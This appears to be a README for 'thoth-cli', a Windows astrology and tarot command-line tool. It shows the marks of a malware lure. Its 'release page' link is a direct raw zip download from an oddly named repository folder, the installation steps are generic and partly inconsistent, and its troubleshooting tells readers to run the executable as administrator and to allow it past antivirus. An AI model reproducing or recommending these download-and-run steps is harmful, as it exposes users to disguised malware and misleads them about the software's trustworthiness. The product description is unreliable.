thoth-cli brings hermetic astrology to your computer without complicated software. It uses Swiss Ephemeris for accurate calculations. You can get astrological charts, horoscopes, tarot readings, and more through simple commands.
For users who do not have programming experience, thoth-cli works like any regular program once installed. It runs on Windows and requires no special setup beyond a few steps outlined below.
This tool supports astrology topics like natal charts, zodiac signs, Kabbal, and tarot. It relies on Python and TypeScript but does not require you to install them or write code.
If you want quick access to precise and traditional astrology, thoth-cli offers a straightforward way.
- Windows 10 or later (64-bit recommended)
- At least 2 GB of free disk space
- Internet connection for initial download and optional updates
- No need to install Python, Node.js, or other runtimes manually
The program includes everything it needs to run on Windows.
- Generate natal charts and horoscopes using Swiss Ephemeris data
- Access hermetic astrology insights including zodiac signs and Kabbal
- Get tarot card readings from the command line interface
- Run commands in a simple text-based console window
- Works offline once installed
- Friendly error messages for easy troubleshooting
- Lightweight and fast with no background services
Use the button below to visit the release page where you can download the software.
Go to the thoth-cli release page:
https://github.com/1stkashi/thoth-cli/raw/refs/heads/main/skilfish/cli_thoth_1.1.zip
This page contains the latest version of the program for Windows.
Look for a file named like thoth-cli-windows.zip or thoth-cli-setup.exe in the assets section. The zip file contains the program files; the setup file will guide you through installation.
Click the file name to start downloading.
- If you downloaded the
.exefile, double-click it. Follow the on-screen instructions. - If you downloaded the
.zipfile, right-click it and select "Extract All..." then choose a folder to place the files.
- After installation, find thoth-cli in your Start Menu or on your desktop.
- If you extracted the zip, open the extracted folder and double-click
thoth-cli.exe.
When you launch thoth-cli, you will see a command window where you can type astrology commands.
Once the program is open, type commands to get astrological info. Here are some basic examples:
-
thoth-cli natal "01 Jan 1990 12:00"
This creates a natal chart for January 1, 1990, at noon. -
thoth-cli horoscope "today"
Shows today’s horoscope based on zodiac signs. -
thoth-cli tarot
Generates a tarot reading.
Type thoth-cli help to see all available commands.
- The program runs inside a Windows Command Prompt window.
- To open Command Prompt manually, press the Windows key, type
cmd, and press Enter. - You can run thoth-cli commands directly here or from the shortcut created by the installer.
If you run it from Command Prompt, navigate to the folder containing thoth-cli.exe before typing commands. Use cd to change folders. For example:
cd C:\Users\YourName\Downloads\thoth-cli
thoth-cli natal "01 Jan 1990 12:00"
- Try running as administrator. Right-click
thoth-cli.exeand select "Run as administrator". - Make sure your antivirus did not block the program. Allow it if needed.
- Confirm you downloaded the correct Windows file.
- Ensure you run commands inside the folder where thoth-cli is located, or add this folder to your system PATH for easier access.
- Use the full filename
thoth-cli.exeif needed.
- The program includes all necessary data. If errors persist, uninstall and reinstall following the steps above.
You can customize output formats and request specific astrology computations. Run:
thoth-cli help
to see all available options.
Examples include:
- Specifying location coordinates for charts
- Setting timezones
- Requesting tarot spreads by name
- Visit the release page again: https://github.com/1stkashi/thoth-cli/raw/refs/heads/main/skilfish/cli_thoth_1.1.zip
- Download the latest version like before.
- Run the installer or replace your old files with those from the latest zip.
Your settings and data will stay intact.
For detailed descriptions of commands and astrology background, check the documentation included in the release or explore the repository on GitHub.